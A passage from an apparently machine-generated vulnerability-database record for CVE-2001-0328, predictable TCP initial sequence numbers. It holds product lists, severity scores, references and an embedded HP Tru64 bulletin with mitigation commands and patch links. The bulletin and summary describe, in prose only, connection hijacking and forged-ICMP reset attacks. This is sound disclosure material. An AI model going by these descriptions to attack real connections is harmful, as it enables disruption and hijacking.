        "trust": 0.3,
        "vendor": "apple",
        "version": "77.0"
      },
      {
        "model": "rtu500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "abb",
        "version": "11.3"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.x"
      },
      {
        "model": "rtu500 series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "abb",
        "version": "11.4.1"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:sun:solaris",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:cisco:ios",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:hp:hp-ux",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Originally discovered by Tim Newsham \u003ctim.newsham@guardent.com\u003e.",
    "sources": [
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2001-0328",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2001-0328",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 1.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CARNEGIE MELLON",
            "availabilityImpact": "PARTIAL",
            "availabilityRequirement": "NOT DEFINED",
            "baseScore": 5.8,
            "collateralDamagePotential": "NOT DEFINED",
            "confidentialityImpact": "PARTIAL",
            "confidentialityRequirement": "NOT DEFINED",
            "enviromentalScore": 3.6,
            "exploitability": "FUNCTIONAL",
            "exploitabilityScore": 8.6,
            "id": "VU#498440",
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "integrityRequirement": "NOT DEFINED",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "remediationLevel": "OFFICIAL FIX",
            "reportConfidence": "CONFIRMED",
            "severity": "MEDIUM",
            "targetDistribution": "MEDIUM",
            "trust": 0.8,
            "userInterationRequired": null,
            "vector_string": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2001-0328",
            "trust": 1.8,
            "value": "Medium"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#498440",
            "trust": 0.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200106-174",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TCP implementations that use random increments for initial sequence numbers (ISN) can allow remote attackers to perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. Attacks against TCP initial sequence number generation have been discussed for some time now. It has long been recognized that the ability to know or predict ISNs can lead to TCP connection hijacking or spoofing. What was not previously illustrated was just how predictable one commonly-used method of randomizing new connection ISNs is in some modern TCP/IP implementations. \nA vulnerability exists in some TCP/IP stack implementations that use random increments for initial sequence numbers.  Such implementations are vulnerable to statistical attack, which could allow an attacker to predict, within a reasonable range, sequence numbers of future and existing connections. \nBy predicting a sequence number, several attacks could be performed; an attacker could disrupt or hijack existing connections, or spoof future connections. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nHP SECURITY BULLETIN\n\nHPSBTU01210     REVISION: 0\n\nSSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of\n                           Service (DoS)\n\nNOTICE:\nThere are no restrictions for distribution of this Security\nBulletin provided that it remains complete and intact. \n\nThe information in this Security Bulletin should be acted upon\nas soon as possible. \n\nINITIAL RELEASE:\n15 July 2005\n\nPOTENTIAL SECURITY IMPACT:\nRemote Denial of Service (DoS)\n\nSOURCE:\nHewlett-Packard Company\nHP Software Security Response Team\n\nVULNERABILITY SUMMARY:\nSeveral potential security vulnerabilities have been identified\nin the HP Tru64 UNIX TCP/IP including ICMP, and Initial Sequence\nNumber generation (ISNs). These exploits could result in a remote\nDenial of Service (DoS) from network throughput reduction for\nTCP connections, the reset of TCP connections, or TCP spoofing. \n\nREFERENCES:\nCERT CA-2001-09, NISCC Vulnerability Advisory VU#498440 VU#532967,\nCAN-2004-0790 CAN-2004-0791 CAN-2004-1060 CAN-2001-0328\n\nSUPPORTED SOFTWARE VERSIONS*:  ONLY impacted versions are listed. \nHP Tru64 UNIX 5.1B-3\nHP Tru64 UNIX 5.1B-2/PK4\nHP Tru64 UNIX 5.1A PK\nHP Tru64 UNIX 4.0G PK4\nHP Tru64 UNIX 4.0F PK8\n\nBACKGROUND:\n\nSpecial Instructions for the Customer\n\nThe Internet Control Message Protocol (ICMP) (RFC 792) is used in\nthe Internet Architecture to perform fault-isolation and recovery\n(RFC816), which is the group of actions that hosts and routers\ntake to determine if a network failure has occurred. \n\nThe industry standard TCP specification (RFC 793) has a\nvulnerability whereby ICMP packets can be used to perform a\nvariety of attacks such as blind connection reset attacks and\nblind throughput-reduction attacks. Blind connection reset\nattacks can be triggered by an attacker sending forged ICMP\n\"Destination Unreachable, host unreachable\" packets or ICMP\n\"Destination Unreachable, port unreachable\" packets.  Blind\nthroughput-reduction attacks can be caused by an attacker sending\na forged ICMP type 4 (Source Quench) packet. \n\nPath MTU Discovery (RFC 1191) describes a technique for\ndynamically discovering the MTU (maximum transmission unit) of an\narbitrary internet path.  This protocol uses ICMP packets from\nthe router to discover the MTU for a TCP connection path.  An\nattacker can reduce the throughput of a TCP connection by sending\nforged ICMP packets (or their IPv6 counterpart) to the\ndiscovering host, causing an incorrect Path MTU setting. \n\nHP has addressed these potential vulnerabilities by providing a\nnew kernel tunable in Tru64 UNIX V5.1B and 5.1A,\nicmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two\nnew kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. \nThe icmp_rejectcodemask tunable is already available in Tru64\nUNIX V5.1B and 5.1A. \n\nicmp_tcpseqcheck\n\nThe icmp_tcpseqcheck variable mitigates ICMP attacks against TCP\nby checking that the TCP sequence number contained in the payload\nof the ICMP error message is within the range of the data already\nsent but not yet acknowledged. An ICMP error message that does\nnot pass this check is discarded. This behavior protects TCP\nagainst spoofed ICMP packets. \n\nSet the tunable as follows:\n\n  icmp_tcpseqcheck=1 (default)\n\n    Provides a level of protection that reduces the possibility\n    of considering a spoofed ICMP packet as valid\n    to one in two raised to the thirty-second power. \n\n  icmp_tcpseqcheck=0\n\n    Retains existing behavior, i.e., accepts all ICMP packets\n\nicmp_rejectcodemask\n\nIn the Requirements for IP Version 4 Routers (RFC 1812), research\nsuggests that the use of ICMP Source Quench packets is an\nineffective (and unfair) antidote for congestion. Thus, HP\nrecommends completely ignoring ICMP Source Quench packets using\nthe icmp_rejectcodemask tunable. The icmp_rejectcodemask is a\nbitmask that designates the ICMP codes that the system should\nreject. For example, to reject ICMP Source Quench packets,\nset the mask bit position for the ICMP_SOURCEQUENCH code 4,\nwhich is two to the 4th power = 16 (0x10 hex). \nThe icmp_rejectcodemask tunable can be used to reject any\nICMP packet type, or multiple masks can be combined to reject\nmore than one type. \n\nNote: the ICMP type codes are defined in\n      \"/usr/include/netinet/ip_icmp.h\". \n\n  Set the tunable as follows:\n\n    icmp_rejectcodemask = 0x10\n\n      Rejects ICMP Source Quench packets\n\n    icmp_rejectcodemask = 0 (default)\n\n      Retains existing behavior, i.e., accepts all ICMP packets\n\nAdjusting the variables\n\nThe ICMP sequence check variable (icmp_tcpseqcheck) can be\nadjusted using the sysconfig and sysconfigdb commands:\n\n# sysconfig -q inet icmp_tcpseqcheck\ninet:\nicmp_tcpseqcheck = 1\n# sysconfig -r inet icmp_tcpseqcheck=0\nicmp_tcpseqcheck: reconfigured\n# sysconfig -q inet icmp_tcpseqcheck\ninet:\nicmp_tcpseqcheck = 0\n# sysconfig -q inet icmp_tcpseqcheck \u003e /tmp/icmp_tcpseqcheck_merge\n# sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet\n# sysconfigdb -l inet\n\ninet:\n      icmp_tcpseqcheck = 1\n\nSimilarly, the icmp_rejectcodemask variable can be adjusted using\nthe sysconfig and sysconfigdb commands:\n\n# sysconfig -q inet icmp_rejectcodemask\ninet:\nicmp_rejectcodemask = 0\n# sysconfig -r inet icmp_rejectcodemask=0x10\nicmp_rejectcodemask: reconfigured\n# sysconfig -q inet icmp_rejectcodemask\ninet:\nicmp_rejectcodemask = 16\n# sysconfig -q inet icmp_rejectcodemask\n   \u003e /tmp/icmp_rejectcodemask_merge\n# sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet\n# sysconfigdb -l inet\n\ninet:\n        icmp_rejectcodemask = 16\n\nRESOLUTION:\n\nUntil the corrections are available in a mainstream\nrelease patch kit, HP is releasing the following Early Release\nPatch (ERP) kits publicly for use by any customer. \n\nThe ERP kits use dupatch to install and will not install over\nany installed Customer Specific Patches (CSPs) that have file\nintersections with the ERPs. Contact your service provider for\nassistance if the ERP installation is blocked by any of your\ninstalled CSPs. \n\nThe fixes contained in the ERP kits are scheduled to be\navailable in the following mainstream patch kits:\n\n    HP Tru64 Unix 5.1B-4\n\nEarly Release Patches\n\nThe ERPs deliver the following file:\n\n/sys/BINARY/inet.mod\n\nHP Tru64 UNIX 5.1B-3 ERP Kit Name:\n   T64KIT0025925-V51BB26-ES-20050628\nKit Location:\n  http://www.itrc.hp.com/service/patch/patchDetail.do?\n  patchid=T64KIT0025925-V51BB26-ES-20050628\nMD5 checksum: 129251787a426320af16cd584b982027\n\nHP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name:\n  T64KIT0025924-V51BB25-ES-20050628\nKit Location:\n  http://www.itrc.hp.com/service/patch/patchDetail.do?\n  patchid=T64KIT0025924-V51BB25-ES-20050628\nMD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af\n\nHP Tru64 UNIX 5.1A PK6 ERP Kit Name:\n  T64KIT0025922-V51AB24-ES-20050628\nKit Location:\n  http://www.itrc.hp.com/service/patch/patchDetail.do?\n  patchid=T64KIT0025922-V51AB24-ES-20050628\nMD5 checksum: 7c373b35c95945651a1cfda96bf71421\n\nHP Tru64 UNIX 4.0G PK4 ERP Kit Name:\n  T64KIT0025920-V40GB22-ES-20050628\nKit Location:\n  http://www.itrc.hp.com/service/patch/patchDetail.do?\n  patchid=T64KIT0025920-V40GB22-ES-20050628\nMD5 checksum: 13849fd555239d75d300d1cb46dc995f\n\nHP Tru64 UNIX 4.0F PK8 ERP Kit Name:\n  DUXKIT0025921-V40FB22-ES-20050628\nKit Location:\n  http://www.itrc.hp.com/service/patch/patchDetail.do?\n  patchid=T64KIT0025920-V40GB22-ES-20050628\nMD5 checksum: 743b614d39f185802701b7f2dd14ffa5\n\nMD5 checksums are available from the ITRC patch database main\npage:\n   http://www.itrc.hp.com/service/patch/mainPage.do\n- From the patch database main page, click Tru64 UNIX,\nthen click verifying MD5 checksums under useful links. \n\nGeneral ITRC Patch Page:\nhttp://www.itrc.hp.com/service/patch/mainPage\n\n\n\nSUPPORT: For further information, contact normal HP Services\nsupport channel. \n\nREPORT: To report a potential security vulnerability with any HP\nsupported product, send Email to: security-alert@hp.com. It is\nstrongly recommended that security related information being\ncommunicated to HP be encrypted using PGP, especially exploit\ninformation. To obtain the security-alert PGP key please send an\ne-mail message to security-alert@hp.com with the Subject of\n\u0027get key\u0027 (no quotes). \n\nSUBSCRIBE: To initiate a subscription to receive future HP\nSecurity Bulletins via Email:\n\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026\nlangcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\n\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your IRTC security bulletins and patches\n     - check ALL categories for which alerts are required and\n       continue. \nUnder Step2: your IRTC operating systems\n     - verify your operating system selections are checked and\n       save. \n\nTo update an existing subscription:\nhttp://h30046.www3.hp.com/subSignIn.php\n\nLog in on the web page\n  Subscriber\u0027s choice for Business: sign-in. \nOn the Web page:\n Subscriber\u0027s Choice: your profile summary\n   - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit:\nhttp://itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\n  relates to is represented by the 5th and 6th characters of the\n  Bulletin number:\n    GN = HP General SW,\n    MA = HP Management Agents,\n    MI = Misc. 3rd party SW,\n    MP = HP MPE/iX,\n    NS = HP NonStop Servers,\n    OV = HP OpenVMS,\n    PI = HP Printing \u0026 Imaging,\n    ST = HP Storage SW,\n    TL = HP Trusted Linux,\n    TU = HP Tru64 UNIX,\n    UX = HP-UX,\n    VV = HP Virtual Vault\n\nSystem management and security procedures must be reviewed\nfrequently to maintain system integrity. HP is continually\nreviewing and enhancing the security features of software products\nto provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to\nbring to the attention of users of the affected HP products the\nimportant security information contained in this Bulletin. HP\nrecommends that all users determine the applicability of this\ninformation to their individual situations and take appropriate\naction. HP does not warrant that this information is necessarily\naccurate or complete for all user situations and, consequently, HP\nwill not be responsible for any damages resulting from user\u0027s use\nor disregard of the information provided in this Bulletin. To the\nextent permitted by law, HP disclaims all warranties, either\nexpress or implied, including the warranties of merchantability\nand fitness for a particular purpose, title and non-infringement.\"\n\n\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or\neditorial errors or omissions contained herein. The information\nprovided is provided \"as is\" without warranty of any kind. To the\nextent permitted by law, neither HP nor its affiliates,\nsubcontractors or suppliers will be liable for incidental, special\nor consequential damages including downtime cost; lost profits;\ndamages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. \nThe information in this document is subject to change without\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\nproducts referenced herein are trademarks of Hewlett-Packard\nCompany in the United States and other countries. Other product\nand company names mentioned herein may be trademarks of their\nrespective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQA/AwUBQtuSLuAfOvwtKn1ZEQJXrwCgpDVfLyXvXZd3sF6bswgQ3DLz5jcAoNt2\nAs7Gf9BY697IdlYjIlmrirG1\n=143G\n-----END PGP SIGNATURE-----\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      },
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "PACKETSTORM",
        "id": "38762"
      }
    ],
    "trust": 2.7
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2001-0328",
        "trust": 3.6
      },
      {
        "db": "BID",
        "id": "2682",
        "trust": 2.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#498440",
        "trust": 1.9
      },
      {
        "db": "SREASON",
        "id": "57",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "8044",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1033181",
        "trust": 1.0
      },
      {
        "db": "XF",
        "id": "139",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-15-153-01",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-15-169-01",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039",
        "trust": 0.8
      },
      {
        "db": "SGI",
        "id": "20030201-01-P",
        "trust": 0.6
      },
      {
        "db": "CERT/CC",
        "id": "CA-2001-09",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:4922",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "38762",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "db": "PACKETSTORM",
        "id": "38762"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "id": "VAR-200106-0110",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2022-05-06T12:31:37.040000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ios-tcp-isn-random-pub",
        "trust": 0.8,
        "url": "http://www.cisco.com/warp/public/707/ios-tcp-isn-random-pub.shtml"
      },
      {
        "title": "HPSBUX00205",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01336000"
      },
      {
        "title": "HPSBUX00205",
        "trust": 0.8,
        "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/hp-ux/hpsbux00205.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://jp.sun.com/"
      },
      {
        "title": "ios-tcp-isn-random-pub",
        "trust": 0.8,
        "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/ios-tcp-isn-random-pub-j.shtml"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.cert.org/advisories/ca-2001-09.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/2682"
      },
      {
        "trust": 1.6,
        "url": "http://securityreason.com/securityalert/57"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/8044"
      },
      {
        "trust": 1.6,
        "url": "ftp://patches.sgi.com/support/free/security/advisories/20030201-01-p"
      },
      {
        "trust": 1.1,
        "url": "http://www.kb.cert.org/vuls/id/498440"
      },
      {
        "trust": 1.0,
        "url": "http://www.securitytracker.com/id/1033181"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4922"
      },
      {
        "trust": 1.0,
        "url": "https://support.f5.com/csp/article/k19063943?utm_source=f5support\u0026amp;utm_medium=rss"
      },
      {
        "trust": 0.8,
        "url": "http://www.cert.org/advisories/ca-1995-01.html"
      },
      {
        "trust": 0.8,
        "url": "ftp://research.att.com/dist/internet_security/117.ps.z"
      },
      {
        "trust": 0.8,
        "url": "http://pdos.csail.mit.edu/~rtm/papers/117.pdf"
      },
      {
        "trust": 0.8,
        "url": "ftp://research.att.com/dist/internet_security/ipext.ps.z"
      },
      {
        "trust": 0.8,
        "url": "https://www.cs.columbia.edu/~smb/papers/ipext.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://cseweb.ucsd.edu/classes/sp99/cse227/ipext.pdf"
      },
      {
        "trust": 0.8,
        "url": "http://lcamtuf.coredump.cx/oldtcp/"
      },
      {
        "trust": 0.8,
        "url": "http://lcamtuf.coredump.cx/newtcp/"
      },
      {
        "trust": 0.8,
        "url": "ftp://ftp.isi.edu/in-notes/rfc1948.txt"
      },
      {
        "trust": 0.8,
        "url": "ftp://ftp.isi.edu/in-notes/rfc793.txt"
      },
      {
        "trust": 0.8,
        "url": "ftp://ftp.isi.edu/in-notes/rfc1323.txt"
      },
      {
        "trust": 0.8,
        "url": "ftp://ftp.isi.edu/in-notes/rfc1750.txt"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-1999-0077"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2000-0328"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/static/139.php"
      },
      {
        "trust": 0.8,
        "url": "http://www.usenix.com/publications/library/proceedings/security95/full_papers/joncheray.txt"
      },
      {
        "trust": 0.8,
        "url": "http://www.guardent.com/pr2001-03-12-ips.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.usenix.org/legacy/publications/library/proceedings/security95/full_papers/joncheray.txt"
      },
      {
        "trust": 0.8,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-169-01"
      },
      {
        "trust": 0.8,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-153-01"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2001-0328"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2001-0328"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:4922"
      },
      {
        "trust": 0.3,
        "url": "http://razor.bindview.com/publish/papers/tcpseq.html"
      },
      {
        "trust": 0.3,
        "url": "https://library.e.abb.com/public/03edbe8b0bed400a8b294347be5d66ab/abb_softwarevulnerabilityhandlingadvisory_abb-vu-pgga-1kgt090284.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://www.itrc.hp.com/service/patch/mainpage.do"
      },
      {
        "trust": 0.1,
        "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0790"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2001-0328"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0791"
      },
      {
        "trust": 0.1,
        "url": "http://www.itrc.hp.com/service/patch/patchdetail.do?"
      },
      {
        "trust": 0.1,
        "url": "http://www.itrc.hp.com/service/patch/mainpage"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1060"
      },
      {
        "trust": 0.1,
        "url": "http://h30046.www3.hp.com/subsignin.php"
      },
      {
        "trust": 0.1,
        "url": "http://itrc.hp.com/service/cki/secbullarchive.do"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "db": "PACKETSTORM",
        "id": "38762"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "db": "PACKETSTORM",
        "id": "38762"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2001-03-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "date": "2001-03-14T00:00:00",
        "db": "BID",
        "id": "2682"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "date": "2005-07-19T14:36:44",
        "db": "PACKETSTORM",
        "id": "38762"
      },
      {
        "date": "2001-06-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "date": "2001-06-27T04:00:00",
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-10-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#498440"
      },
      {
        "date": "2016-10-26T05:08:00",
        "db": "BID",
        "id": "2682"
      },
      {
        "date": "2008-02-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2001-000039"
      },
      {
        "date": "2009-03-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      },
      {
        "date": "2017-10-19T01:29:00",
        "db": "NVD",
        "id": "CVE-2001-0328"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "38762"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple TCP/IP implementations may use statistically predictable initial sequence numbers",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#498440"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200106-174"
      }
    ],
    "trust": 0.9
  }
}

var-200801-0578
Vulnerability from variot

